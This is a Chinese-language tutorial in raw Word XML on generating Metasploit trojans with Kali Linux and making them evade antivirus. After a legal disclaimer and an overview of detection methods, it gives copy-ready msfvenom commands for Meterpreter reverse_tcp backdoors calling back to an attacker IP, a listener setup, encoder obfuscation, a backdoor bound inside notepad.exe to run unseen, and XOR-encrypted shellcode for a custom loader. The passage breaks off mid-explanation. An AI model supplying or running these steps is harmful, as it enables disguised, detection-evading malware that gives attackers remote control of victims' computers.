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316D1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Kali Linux MSF生成木马与免杀实战教程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353891D8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⚠️ 法律与合规声明（必看）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5AEBE5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本教程仅用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>授权渗透测试、网络安全教学与研究</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，严禁用于非法入侵、窃取他人数据、破坏计算机系统等违法违规活动。使用本教程中的技术和命令，必须获得目标系统的合法授权，违者将自行承担全部法律责任，与教程编写者无关。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449DA231">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="heading_1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>一、基础概念（理解核心，才能做好免杀）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="20D9E4FC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1.1 核心工具说明（注释：Kali默认已安装，无需额外配置，重点记用途）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="787E6300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msfvenom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：Metasploit框架集成的Payload（木马核心）生成工具，替代旧版的msfpayload和msfencode，功能更全面，支持生成各类平台（Windows、Linux、Android）的木马，可实现编码、加密、捆绑等免杀基础操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374AA15D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Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：Metasploit的高级Payload，不是简单的“病毒”，而是一个交互式的后渗透工具，能实现内存执行、文件操作、提权、屏幕控制、键盘记录等完整后渗透功能，本教程全程使用最稳定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（反向连接）模式（注释：反向连接=靶机主动连接攻击机，可绕过靶机防火墙，成功率更高）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3867881E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免杀（Anti-Virus Evasion）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：核心是“欺骗杀毒软件（AV/EDR）”，通过技术手段修改Payload的特征、执行方式，让杀软无法识别其为恶意程序，核心是绕过杀软的三大检测机制（后面详细讲）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA3A781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1.2 杀软检测原理（免杀的核心前提，必须理解）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="52D7474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免杀的本质是“破坏杀软的检测逻辑”，先搞懂杀软怎么查毒，才能针对性做免杀，以下是主流杀软的4种核心检测方式，也是我们后续免杀的突破点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D851F9B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静态检测（最基础，最易绕过）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：杀软会提取文件的哈希值、特征码、PE结构（Windows可执行文件结构）、字符串（比如Payload里的“reverse_tcp”）、导入表（程序调用的系统函数），与自身病毒库比对，只要有一项匹配，就判定为病毒。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注释：基础木马之所以极易被杀，就是因为其特征码、字符串完全匹配杀软病毒库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4494B75D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动态检测（进阶检测，难度稍高）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：杀软会监控程序运行时的行为，比如程序是否创建异常进程、是否注入其他进程内存、是否修改注册表、是否发起反向连接，只要触发杀软的行为规则，就会被拦截。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F3E15D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沙箱/虚拟机检测（防测试，针对性规避）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：杀软会模拟虚拟环境（沙箱、虚拟机），让程序在虚拟环境中运行，若程序是恶意的，会在虚拟环境中暴露恶意逻辑；反之，合法程序则正常运行。很多免杀失败，就是因为没规避沙箱检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B900B3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内存检测（深层检测，需特殊处理）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：杀软会扫描系统内存中的Shellcode（木马核心代码）特征，即使文件本身没被检测到，一旦Shellcode加载到内存，被扫描到特征，依然会被查杀。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4B7432">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="heading_4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>二、Kali MSF生成基础木马（无免杀，用于测试连接，必学）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="52B37236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2.1 环境准备（注释：Kali默认已配置，执行以下命令确认环境正常）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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00891F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29748E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1. 更新系统依赖（确保metasploit-framework是最新版，避免命令报错）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sudo apt update &amp;&amp; sudo apt install metasploit-framework -y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2. 确认攻击机IP（本教程已固定为192.168.44.129，执行此命令验证IP是否正确）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ip a  # 查看eth0网卡的IP，确认是192.168.44.129，若不是，需重新配置KaliIP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FD6B540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2.2 msfvenom基础命令解析（固定参数，无需修改）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="76D31B0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本教程所有命令均固定以下参数，无需手动调整，复制即可执行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A435BA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-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：指定Payload（木马核心），根据靶机系统选择32位/64位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238AA597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LHOST=192.168.44.129</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：固定为Kali攻击机IP（已写死，无需修改）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF1126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LPORT=4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：固定监听端口（选择4444端口，避开常用端口，减少被拦截概率）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0113C718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-f exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：固定输出格式为exe（适配Windows靶机，最常用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5314C037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-o 文件名.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：固定输出文件名，便于区分不同版本的木马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635793B9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2.3 生成Windows 32/64位基础木马（注释：无免杀，仅用于测试连接，大概率会被杀毒软件查杀）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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42F0CC4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29CE46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1. Windows 32位基础木马（适配Win7及以下32位系统，文件名：shell.exe）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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.44.129 LPORT=4444 -f exe -o shell.exe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2. Windows 64位基础木马（适配Win10/11/Win8 64位系统，兼容性更好，推荐使用，文件名：shell64.exe）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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.44.129 LPORT=4444 -f exe -o shell64.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C9E683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注释：生成后，将exe文件复制到Windows靶机（需关闭靶机杀软，否则会被立即查杀），后续启动监听后，运行exe即可建立连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCBA7D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补充：生成木马时常见报错解析（对应你执行命令的报错）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D95F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执行基础木马生成命令后，若出现以下报错/提示，属于正常现象，无需担心，不影响木马生成和使用：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49EDA5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D42BA5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Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name =&gt; spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.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[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload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[-] No arch selected, selecting arch: x64 from the payload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No encoder specified, outputting raw payload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Payload size: 510 bytes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Final size of exe file: 7168 bytes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Saved as: shell64.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="770007B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报错/提示逐一解析：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCB2EB4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DidYouMean::SPELL_CHECKERS.merge! 已废弃</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：属于Ruby语言依赖库的版本兼容提示，不影响msfvenom功能，无需处理，后续更新metasploit-framework可缓解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACD234B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No platform was selected...No arch selected...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：提示未手动指定系统平台（Platform）和架构（arch），msfvenom自动从Payload（windows/x64/meterpreter/reverse_tcp）中识别出“Windows平台、x64架构”，属于正常自动适配，无需额外添加参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAD5F6C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No encoder specified, outputting raw payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：提示未指定编码器（-e参数），因此输出原始Payload（未进行编码混淆），这也是“基础木马极易被杀”的原因，后续执行编码免杀命令时添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-e x86/shikata_ga_nai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>即可解决。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0014F4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Payload size: 510 bytes...Saved as: shell64.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：此为成功提示，说明木马已生成完成，Payload（核心代码）大小510字节，最终exe文件大小7168字节，保存为shell64.exe，可正常使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42522570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2.4 启动MSF监听（接收靶机连接，固定命令，复制执行）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="49AD814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攻击机（Kali）需启动监听，等待靶机运行木马后主动连接，命令固定，无需修改，步骤如下：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668E4A8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B87F9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1. 启动Metasploit控制台（msfconsole）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msfconsole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2. 加载监听模块（multi/handler是通用监听模块，支持所有反向连接Payload）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use exploit/multi/handler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3. 配置Payload（必须与生成木马时的Payload一致，否则无法建立连接）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若生成的是64位木马（shell64.exe），执行以下3行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set PAYLOAD windows/x64/meterpreter/reverse_tcp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set LHOST 192.168.44.129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set LPORT 4444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若生成的是32位木马（shell.exe），将上面第一行改为：set PAYLOAD windows/meterpreter/reverse_tcp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4. 启动监听（等待靶机连接，启动后不要关闭控制台）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run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CB9CEF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注释：监听启动后，靶机运行对应的exe木马，攻击机将自动获取Meterpreter会话（出现“meterpreter &gt; ”即为连接成功），可执行后续后渗透操作（如ls、pwd、screenshot等）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C8796">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="heading_9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>三、免杀原理与实战（从基础到进阶，逐步提升免杀率）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="513539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核心逻辑：从“破坏杀软检测机制”出发，先绕过静态检测，再规避动态检测、沙箱检测，逐步提升免杀效果，最终实现“杀软不报警、木马能正常运行并回连”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE0E44C">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="heading_10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>3.1 基础免杀：编码混淆（绕过静态检测，最简单、最基础）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="4D91C99A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原理详解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="151E1EE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杀软的静态检测依赖“固定特征码”，编码混淆的核心是：用编码器对木马的Shellcode（核心恶意代码）进行多轮异或、循环移位、多态变形，每次生成的Payload哈希值、特征码、字符串都完全不同，从而破坏杀软的静态特征库匹配，达到绕过静态检测的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470C5F3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关键说明：本教程使用MSF中免杀效果最好的编码器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>x86/shikata_ga_nai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（MSF官方评级excellent），其特点是：多态变形（每次编码结果不同）、动态密钥（编码密钥随机生成）、循环异或（多层加密），是基础免杀的首选。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B46A0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补充参数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 指定编码器，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 指定编码迭代次数（5-15次最佳，次数过少，特征未完全破坏；次数过多（&gt;20），会导致Shellcode体积过大、解码失败，程序无法运行）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473CBDA2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等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>实战命令（固定IP和参数，复制即可执行）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12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4B9735A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3C754C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1. 32位编码免杀木马（12次编码，文件名：shell_encode.exe）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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.44.129 LPORT=4444 -e x86/shikata_ga_nai -i 12 -f exe -o shell_encode.exe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2. 64位编码免杀木马（12次编码，推荐使用，文件名：shell64_encode.exe）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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.44.129 LPORT=4444 -e x86/shikata_ga_nai -i 12 -f exe -o shell64_encode.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FA055A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注释：编码后的木马，静态检测率会大幅降低，但仍可能被动态检测、内存检测拦截，适合用于测试杀软的静态检测规避效果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7B7E14">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="heading_13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>3.2 进阶免杀1：捆绑合法程序（伪装+PE结构混淆，提升免杀率）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="1731F609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等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>原理详解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="6AF5B14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是“伪装”：将恶意Payload注入到正常、合法的PE文件（如Windows自带的notepad.exe、putty.exe，或常用软件安装包）中，保留原合法程序的所有功能（比如notepad.exe能正常打开记事本），同时将恶意代码作为新线程注入到程序中，后台运行、悄悄回连。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404D95F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免杀逻辑：通过捆绑，改变了恶意程序的PE结构、导入表、资源段，杀软扫描时，优先识别到合法程序的特征，忽略隐藏在其中的恶意代码，从而同时绕过静态检测（结构改变）和部分动态检测（伪装成合法程序行为）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B39EA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关键参数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 指定合法程序模板（需提前从Windows复制到Kali的/root目录），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 保留原程序执行逻辑（必加，否则原程序无法正常运行，容易被怀疑）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECE0168">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="heading_15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>实战步骤（详细注释，一步不落地执行）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="4373B909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准备模板程序：从Windows系统（任意版本）中，找到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>notepad.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（路径：C:\Windows\notepad.exe），将其复制到Kali的/root目录下（可通过U盘、共享文件夹、wget等方式传输）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190F2E65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生成捆绑免杀木马（固定命令，复制执行，文件名：notepad_backdoor.exe）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.44.129 LPORT=4444 -e x86/shikata_ga_nai -i 12 -x notepad.exe -k -f exe -o notepad_backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2189A09B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测试效果：将生成的notepad_backdoor.exe复制到靶机，运行后，会正常打开记事本（伪装效果），同时后台悄悄回连攻击机（需提前启动监听），杀软大概率不会报警（除非杀软检测到程序的异常线程）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134518B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注释：模板程序建议选择系统自带或常用的合法程序（如calc.exe、mspaint.exe），这类程序的特征在杀软中是“信任”的，伪装效果更好；避免使用小众程序，可能本身就被杀软标记。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385BD029">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="heading_16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>3.3 进阶免杀2：Shellcode加密+自定义加载器（绕过静态+内存检测，免杀效果大幅提升）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="13DFE63E">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="heading_17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>原理详解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="74090A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这是目前最常用、免杀效果最好的基础方案，核心分两步，双重规避检测：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2806A579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Shellcode加密：生成Raw格式的Shellcode（纯机器码，无文件头），用XOR/AES等加密算法加密，加密后的Shellcode是乱码，静态扫描时，杀软无法识别其为恶意代码，彻底绕过静态检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8B0BBA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自定义加载器：编写C/C++加载器（合法程序），程序运行时，先在内存中解密Shellcode，再执行解密后的Shellcode，避免Shellcode落地（不写入磁盘），同时减少内存中Shellcode的暴露时间，绕过内存检测和动态检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6872B2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关键优势：加密后的Shellcode无静态特征，加载器本身是合法程序，运行时仅在内存中解密执行恶意代码，杀软难以捕捉到恶意行为，免杀率远高于编码、捆绑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AA7D16">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="heading_18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>实战步骤（详细注释，可直接复制操作）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="441B8746">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="heading_19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>步骤1：生成XOR加密的Raw Shellcode（固定命令）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19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8599D0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A8052E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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.44.129 LPORT=4444 -e x86/shikata_ga_nai -i 15 --encrypt xor --encrypt-key "msf2025" -f raw -o shellcode.raw</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="728C6C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参数注释：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B21E1D8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--encrypt xor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
